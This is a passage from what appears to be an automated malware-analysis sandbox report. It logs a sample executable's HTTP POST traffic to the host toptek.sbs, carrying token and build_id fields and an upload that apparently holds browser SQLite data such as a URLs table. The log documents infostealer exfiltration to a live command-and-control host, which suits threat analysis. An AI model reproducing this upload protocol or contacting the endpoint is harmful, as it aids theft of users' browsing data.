                                                                                                                                                                                                                                                                                    2024-12-23 05:57:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:45 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:47 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:47 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    16192.168.2.54976894.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:46 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----CJ5X4E3W4EUAIEKXL6FK
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 493
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:46 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 43 4a 35 58 34 45 33 57 34 45 55 41 49 45 4b 58 4c 36 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 35 58 34 45 33 57 34 45 55 41 49 45 4b 58 4c 36 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 35 58 34 45 33 57 34 45 55 41 49 45 4b 58 4c 36 46 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------CJ5X4E3W4EUAIEKXL6FKContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------CJ5X4E3W4EUAIEKXL6FKContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------CJ5X4E3W4EUAIEKXL6FKCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:47 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    17192.168.2.54979594.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:54 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----ECBASJEKF37QIEU37QQI
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 3165
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:54 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 51 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------ECBASJEKF37QIEU37QQIContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------ECBASJEKF37QIEU37QQIContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------ECBASJEKF37QIEU37QQICont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:54 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    18192.168.2.54980794.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----YU3OPPZC2VAIM790RI5P
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 207993
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------YU3OPPZC2VAIM790RI5PContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------YU3OPPZC2VAIM790RI5PContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------YU3OPPZC2VAIM790RI5PCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                    Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:56 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    19192.168.2.549821172.64.41.34437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
